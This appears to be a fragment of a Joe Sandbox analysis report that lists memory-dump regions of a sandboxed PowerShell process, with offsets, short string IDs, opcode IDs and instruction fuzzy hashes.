                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hjq$$fq$$fq
                                                                                                      • API String ID: 0-2439992849
                                                                                                      • Opcode ID: 841c026314b78ac94e460600d6c71a0b2ba6dd2f93d172f53c04ca1fe8b698b1
                                                                                                      • Instruction ID: fce570fb4c49aad1beceaadc724200d645289e6e965d9006efca0082a280f62a
                                                                                                      • Opcode Fuzzy Hash: 841c026314b78ac94e460600d6c71a0b2ba6dd2f93d172f53c04ca1fe8b698b1
                                                                                                      • Instruction Fuzzy Hash: E9125E30B041198FDB25DB64D8956AEBBB6EF89304F1444EDD50AAB361DF35AE81CF80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$$fq
                                                                                                      • API String ID: 0-572745046
                                                                                                      • Opcode ID: 0d6a5a38975777b79b2aa85e1d169061a7c15d6110ace015428095a0e3c17539
                                                                                                      • Instruction ID: 004280cdfa004f45317160a2e5cdd672d2342a058d632b3bcdb15c18018c4b07
                                                                                                      • Opcode Fuzzy Hash: 0d6a5a38975777b79b2aa85e1d169061a7c15d6110ace015428095a0e3c17539
                                                                                                      • Instruction Fuzzy Hash: F9A158F0B053169FCF259B788851F6B7BEA9F96208F1484BAD505CF691DE32C842C3A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq$4'fq$4'fq
                                                                                                      • API String ID: 0-3646979650
                                                                                                      • Opcode ID: 385062c2aebeed8f9d424aeb6e2503b8f5d168c9ed8ce3ad0c7bddba4a7e9922
                                                                                                      • Instruction ID: 71839aa3b950da844bca8785b8237f70d7ec5192b8fda3b73a81b0b2fa14b203
                                                                                                      • Opcode Fuzzy Hash: 385062c2aebeed8f9d424aeb6e2503b8f5d168c9ed8ce3ad0c7bddba4a7e9922
                                                                                                      • Instruction Fuzzy Hash: 0BB180F0A002199FCB14DFA8C941F9EBBB6AF89308F14C459E9056F355CB76EC428B91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $fq$$fq$$fq
                                                                                                      • API String ID: 0-837900676
                                                                                                      • Opcode ID: 0f301f5dbf338517cf2cd06edec5e82e530f98a6cd0ba237334a6e034ef1e2dd
                                                                                                      • Instruction ID: 634745f69779bb6a32b7ffc6681956b6cfbc5a5131b08d9a2ecaacd8d0ef2ee9
                                                                                                      • Opcode Fuzzy Hash: 0f301f5dbf338517cf2cd06edec5e82e530f98a6cd0ba237334a6e034ef1e2dd
                                                                                                      • Instruction Fuzzy Hash: 4F412BF3B002159BCF149A6D8940A6FFBE9AFC421CB2485AACA15EB241DE31D941C7E5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $fq$$fq$$fq
                                                                                                      • API String ID: 0-837900676
                                                                                                      • Opcode ID: 1c3dabaf1fc7b0badfa98dfc87d0d8e87e2c7d69871c1bb123f038662c3053e2
                                                                                                      • Instruction ID: 692ecc3ae387cb66efdbab7a81ec40991c8cd9d2fa3591f8040293b8a6405a5e
                                                                                                      • Opcode Fuzzy Hash: 1c3dabaf1fc7b0badfa98dfc87d0d8e87e2c7d69871c1bb123f038662c3053e2
                                                                                                      • Instruction Fuzzy Hash: 3A218BF231034A5BCB34557D9842F27BBEE5BC131DF2484BAA645CB281DE76C8818361
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$4'fq
                                                                                                      • API String ID: 0-711477973
                                                                                                      • Opcode ID: 37975415034be27ccfe95b9089274885bd6fae9365042a9c39032fda74c90c89
                                                                                                      • Instruction ID: adf64bb3d6a114df8f24acb3144bfbed1276f61515214b7a73c52b3d7b1bd640
                                                                                                      • Opcode Fuzzy Hash: 37975415034be27ccfe95b9089274885bd6fae9365042a9c39032fda74c90c89
                                                                                                      • Instruction Fuzzy Hash: B3226BB0A102159FD724DB58C841F6ABBB2BF85318F15C0D5E909AB356CB72ED82CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l$(f#l
                                                                                                      • API String ID: 0-2952237724
                                                                                                      • Opcode ID: 3987761d1fd5fd81ff2059550e3630beb7f564c526a98d3edca010a41f872fc5
                                                                                                      • Instruction ID: b63508ac183eacffb1e765b406423868864ff322630d6c52ec706049fff21de5
                                                                                                      • Opcode Fuzzy Hash: 3987761d1fd5fd81ff2059550e3630beb7f564c526a98d3edca010a41f872fc5
                                                                                                      • Instruction Fuzzy Hash: 7E91D4F0B10224ABD714DBA8C545FAEBBF2AF89308F109065E9096F755CF72EC418B95
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $fq$$fq
                                                                                                      • API String ID: 0-2537786760
                                                                                                      • Opcode ID: 79603e877f780bcc36e124bbfa0e4a0fcdb64709a61adc5d34a40afc9e483315
                                                                                                      • Instruction ID: d46f4f826a3f9cee67c7686e21ab345f57315af1ddf04c482c1bf99c93be4f0b
                                                                                                      • Opcode Fuzzy Hash: 79603e877f780bcc36e124bbfa0e4a0fcdb64709a61adc5d34a40afc9e483315
                                                                                                      • Instruction Fuzzy Hash: 722149B69042569FCF209F6C8540ABABFBCBF85208B2981E6CD08E7241D2309900C7E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $fq$$fq
                                                                                                      • API String ID: 0-2537786760
                                                                                                      • Opcode ID: 727503005e82eee8f2bbe8b2ae094ba560ca8e2c197cb9ae2b3f0b1ba076f977
                                                                                                      • Instruction ID: 96fb7c5ce72573b48d714d097d450e600b7e0ff40babf5e05c568d3e39f55def
                                                                                                      • Opcode Fuzzy Hash: 727503005e82eee8f2bbe8b2ae094ba560ca8e2c197cb9ae2b3f0b1ba076f977
                                                                                                      • Instruction Fuzzy Hash: 11119CF230035A27DF30052E8982FB37BEE5BC035CF2444BAAA448B2C5DA79D4C18265
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (f#l
                                                                                                      • API String ID: 0-4063606093
                                                                                                      • Opcode ID: cbfa90f565ef72f5f0f534d5d230cd02da13a1d8bf907dceffc6a047053262bd
                                                                                                      • Instruction ID: 7f182259c8843af21b2d7f52e0e5ef33aac11f2207174119cb799a08f6cf6b06
                                                                                                      • Opcode Fuzzy Hash: cbfa90f565ef72f5f0f534d5d230cd02da13a1d8bf907dceffc6a047053262bd
                                                                                                      • Instruction Fuzzy Hash: 0491C5F4700214AFD714DB98C545FAABBF2AF89308F1180A5E909AF795CB72EC41CB95
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'fq
                                                                                                      • API String ID: 0-2007657732
                                                                                                      • Opcode ID: fa16c5f4a2825b7e8d42c82d9757e3e99a48e9d93cfb37f82771f3dc0ff44bc6
                                                                                                      • Instruction ID: 8da2fb749175a910fda6e3dfeb031f73c6a0e5e60528b1358844b70641545c1e
                                                                                                      • Opcode Fuzzy Hash: fa16c5f4a2825b7e8d42c82d9757e3e99a48e9d93cfb37f82771f3dc0ff44bc6
                                                                                                      • Instruction Fuzzy Hash: 324117F0B01316EFCF248F28C940F7ABBEAAF9524DF1484A6E9049B654D732D941C7A1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 248460130faf067291c95745bc6f8b23751c676785df534d7c46b26e7a33a5a4
                                                                                                      • Instruction ID: ef08faa85802ccc7bd0015501b36bdd6b35fc6dad98e40c43cd84282436eec6c
                                                                                                      • Opcode Fuzzy Hash: 248460130faf067291c95745bc6f8b23751c676785df534d7c46b26e7a33a5a4
                                                                                                      • Instruction Fuzzy Hash: 32325974A012499FCB05CFA8C4D4AAEBBF1FF89314F25819AE855AB361C735EC45CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e4d70fa3187b55f7d65b02c071d35e62745b7e75f772579383cb7ddd9fda7759
                                                                                                      • Instruction ID: 376c5932c02068421bdfcc1cf5157b6eb5be8f70eaa2e80be882dd64e9a117c9
                                                                                                      • Opcode Fuzzy Hash: e4d70fa3187b55f7d65b02c071d35e62745b7e75f772579383cb7ddd9fda7759
                                                                                                      • Instruction Fuzzy Hash: 77E12974A01259AFCB05CFA8D4D4A9DBBF2FF49310F258199E844AB352D771ED82CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b27f1bae33baac997c84f3bd860fbd37279ac6f86680761c5be39e33db5cc3b5
                                                                                                      • Instruction ID: 71bbcb58cb6a4a37edab2daf48b1969ba788fa63d9b15b4a0d00751390a87107
                                                                                                      • Opcode Fuzzy Hash: b27f1bae33baac997c84f3bd860fbd37279ac6f86680761c5be39e33db5cc3b5
                                                                                                      • Instruction Fuzzy Hash: E1C19E71A00248DFEB14DFA4C584A9DBBB6FF85310F15859DE406AF365CB74AD49CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4aafdbcbf3a675b8ac838f9bdc8372b6a9b6cfee7c0d497fb51cb96b6ef6db73
                                                                                                      • Instruction ID: bd06eb467d0f221642ca9371b05169cc48a219129d0c28c76e8e5012aad2a0bd
                                                                                                      • Opcode Fuzzy Hash: 4aafdbcbf3a675b8ac838f9bdc8372b6a9b6cfee7c0d497fb51cb96b6ef6db73
                                                                                                      • Instruction Fuzzy Hash: C4D1E574A01219AFDB14CF98D584A9EBBF2FF88314F64D199E815AB351C731ED82CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3dfdf2ebe9854d637175af7bf7572c282eaa1e7216449b626b1548a3f8b8fb90
                                                                                                      • Instruction ID: 607306cfbd659aa2679c80281da15ae5d973c52758d2cdbe0938128c31ee2f7f
                                                                                                      • Opcode Fuzzy Hash: 3dfdf2ebe9854d637175af7bf7572c282eaa1e7216449b626b1548a3f8b8fb90
                                                                                                      • Instruction Fuzzy Hash: 18B17C70E00209DFDB10CFA9C98579EBBF2EF88354F14856DE814AB254EB74E845DB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7ef57f0952f795ddc285b3dd57e4c97aeea196436317f546af1478112c470547
                                                                                                      • Instruction ID: c8ef82cf20b1f1dadaf42b24ad8ae1fd7c549742d3df4601ef92bec0cf193a6b
                                                                                                      • Opcode Fuzzy Hash: 7ef57f0952f795ddc285b3dd57e4c97aeea196436317f546af1478112c470547
                                                                                                      • Instruction Fuzzy Hash: 64B15E70E00209DFDB10CFA9D9857ADBBF2EF88314F1485ADE815E7294EB74A845CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5512e0ba8e72e5872d8b3e4f20e711fe63afa94f05b96f0b5d31dd5d089af6d1
                                                                                                      • Instruction ID: 6c94347c7f3ca2d068787dc9ffe7650fa51d931075fe67a8f18ff96de830ca23
                                                                                                      • Opcode Fuzzy Hash: 5512e0ba8e72e5872d8b3e4f20e711fe63afa94f05b96f0b5d31dd5d089af6d1
                                                                                                      • Instruction Fuzzy Hash: A5818C34A052049FCB15DFB8C5849ADBBF2FF89301F1484A9E445AB361D735EC86DB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5420ca02a768b8f7d9ae7862fdff9826326bc92d8f3004fa4a20e819c2a88052
                                                                                                      • Instruction ID: 45f6d3b0fb826437eebc9a50871aa0f6ba5da29eb513bbae12fa158317750d27
                                                                                                      • Opcode Fuzzy Hash: 5420ca02a768b8f7d9ae7862fdff9826326bc92d8f3004fa4a20e819c2a88052
                                                                                                      • Instruction Fuzzy Hash: 6371AD70A006099FDB14DF68D880A9EBBF2FF84304F1485AEE41ADB651DB74BC46CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 49ce6320fcd75303aa8c991361933e0580c1a015c6857d242ab516c511333f2c
                                                                                                      • Instruction ID: 2563ad21e0fad2f328df08ebf3cf563b6cecf1f7d455a416dcbaaa658c25ac18
                                                                                                      • Opcode Fuzzy Hash: 49ce6320fcd75303aa8c991361933e0580c1a015c6857d242ab516c511333f2c
                                                                                                      • Instruction Fuzzy Hash: 4A714970A002589FEF14DFA5D580AADBBF2FF88304F54846DD412AB6A0DB74AC46CF51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c5b44e472891907a401a73207bc16538db1a59e2e3d737f5065316d660f60d2e
                                                                                                      • Instruction ID: 1a9924de113ee71310cf9da394374f89b87a3a750dae36127d23d7558731ee96
                                                                                                      • Opcode Fuzzy Hash: c5b44e472891907a401a73207bc16538db1a59e2e3d737f5065316d660f60d2e
                                                                                                      • Instruction Fuzzy Hash: A5712C71E00209DFDF14CFA9C9857ADBBF2EF88314F1485A9E415AB294EB74A841CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 06398e0dbccd46e11c1d525f43ed15bbb1e53332ef95edbfd0c523add695cbfd
                                                                                                      • Instruction ID: fc67e96ca56feac32bce0d9d442372782fde1110800285bf50876d07b7da28fc
                                                                                                      • Opcode Fuzzy Hash: 06398e0dbccd46e11c1d525f43ed15bbb1e53332ef95edbfd0c523add695cbfd
                                                                                                      • Instruction Fuzzy Hash: A2711A71E00249DFDF10CFA9C9857EDBBF2EF88314F1481A9E415AB294EB74A845CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1e814e7bad70c37111f63d03738e1228da2d764075dc422133a8aeccf02a6171
                                                                                                      • Instruction ID: c1c8f620295b369458e738d01b3ea966b9de1577daa7f275b37232085d9b9bcb
                                                                                                      • Opcode Fuzzy Hash: 1e814e7bad70c37111f63d03738e1228da2d764075dc422133a8aeccf02a6171
                                                                                                      • Instruction Fuzzy Hash: C3418E71A046148FEB14CF75C498AADBBF2EF89714F1544ACE416EB7A0CB74AC42DB60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5ab7984b26164d51e89057fb6ff6be09f28f81f629f337800fb769001ee75d00
                                                                                                      • Instruction ID: 015bc8f50d9ec29e2a47595ef8d738c3518eacc6abe2207351a3de67e6b6cc3f
                                                                                                      • Opcode Fuzzy Hash: 5ab7984b26164d51e89057fb6ff6be09f28f81f629f337800fb769001ee75d00
                                                                                                      • Instruction Fuzzy Hash: 9D417F70A006189FEB14DFA5C58469DBBF2FF84310F14856DD456AB7A0DB74AC45CF50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 93cb3c45da458110275968668a7e924a2f579234dc6809b56022c8793a2a4921
                                                                                                      • Instruction ID: 8a1ed32f7f63f804297a599575b1a2d2bfcd7d97fb50452230443caf61f907c1
                                                                                                      • Opcode Fuzzy Hash: 93cb3c45da458110275968668a7e924a2f579234dc6809b56022c8793a2a4921
                                                                                                      • Instruction Fuzzy Hash: 6D4145B0A002059FCB09CF59C8D4AAEFBB1FF48314B5582A9D801AB364C736FC51CBA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 88842d31848bb59fc0a7384cf5ba64efc76c208cc0cfd8b2ba3a6f2a4202e391
                                                                                                      • Instruction ID: ac34977d2fc93ea666f1ea6aa61c1b559bb0c8eb46655514144f75b023f78711
                                                                                                      • Opcode Fuzzy Hash: 88842d31848bb59fc0a7384cf5ba64efc76c208cc0cfd8b2ba3a6f2a4202e391
                                                                                                      • Instruction Fuzzy Hash: 1D3186B0B40214ABD714ABA8C955F6FBBA3AF84308F108455EA057F785CF769C428BD5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 81b12de1b07334d020b743e8cfa08839618ba0d3a0984e8b251714a9fd4075a6
                                                                                                      • Instruction ID: 083d6d0561a939d5b92953c3a219ef9e075a202d40e997dafbef6974c6585038
                                                                                                      • Opcode Fuzzy Hash: 81b12de1b07334d020b743e8cfa08839618ba0d3a0984e8b251714a9fd4075a6
                                                                                                      • Instruction Fuzzy Hash: E4219CF27043596BCB144A7D8800F7B7F9A9FC5308F1484AAEA04CB2C6CA35D855D364
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7940000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2b018f9a12efda3ee2331e34b040a8f943dc7072da12464c267e84b205798576
                                                                                                      • Instruction ID: 6be50add4ca8588caef1e5287b015f144dde6c2565900f261111d9e7d3a7463d
                                                                                                      • Opcode Fuzzy Hash: 2b018f9a12efda3ee2331e34b040a8f943dc7072da12464c267e84b205798576
                                                                                                      • Instruction Fuzzy Hash: 0E219CF170031AABCB2456BD8840F3BB6CE9FC530DF24847AA605DB2C0DD75D8919364
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f7d265e9696d93727acf5af4e9836c7bae3939c67925fc9fbc0e2674119de9a1
                                                                                                      • Instruction ID: 1eccb8a23b279103d41c4ac7182fd1d0334aedde7ff117a2b65eb60e1ef26e0d
                                                                                                      • Opcode Fuzzy Hash: f7d265e9696d93727acf5af4e9836c7bae3939c67925fc9fbc0e2674119de9a1
                                                                                                      • Instruction Fuzzy Hash: 66313F30B051288FCB25DB64D8956EEBBB2BF49304F1444E9D509AB351DF36AE91CF81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ae6b3c41b7705acf1655c460696da1d2dee2a4006579731bd6080879bb72c4bd
                                                                                                      • Instruction ID: 037f2dcc7fdbdd96f055525e27f243786bdfdaaeb8f07afd419ea50bc9607fe9
                                                                                                      • Opcode Fuzzy Hash: ae6b3c41b7705acf1655c460696da1d2dee2a4006579731bd6080879bb72c4bd
                                                                                                      • Instruction Fuzzy Hash: 75312C74A046459FCB05CF98C494AAAFBF1FF49310B1582A9E849EB752C735EC51CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 542a21e7605af0ceabfcbc977d8cef2a94318d193e2944a2a876c6c0bd99bb89
                                                                                                      • Instruction ID: 600aa74081079907b4a01e0442d078fb8e965a3a5049dd4bd3b06c63d2b61a36
                                                                                                      • Opcode Fuzzy Hash: 542a21e7605af0ceabfcbc977d8cef2a94318d193e2944a2a876c6c0bd99bb89
                                                                                                      • Instruction Fuzzy Hash: 7221D6B4A012099FCB44CF58C8949AEFBB1FB49310B248599E949EB751C731FD51CFA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2095427274.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_4bc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0402a27bf775304bd8b32982f1048317db30227b53d67d444f19276bdb9962b
                                                                                                      • Instruction ID: 1360d6452b2646a1ed08e7d47f4e3788f974a4322dcaf37737eda7432cfe8086
                                                                                                      • Opcode Fuzzy Hash: c0402a27bf775304bd8b32982f1048317db30227b53d67d444f19276bdb9962b
                                                                                                      • Instruction Fuzzy Hash: 48212375A08244DFCB05CF58C4905B9BBB0FF4A310B5491DAD88ADB6A2C326FC43CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2127467248.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
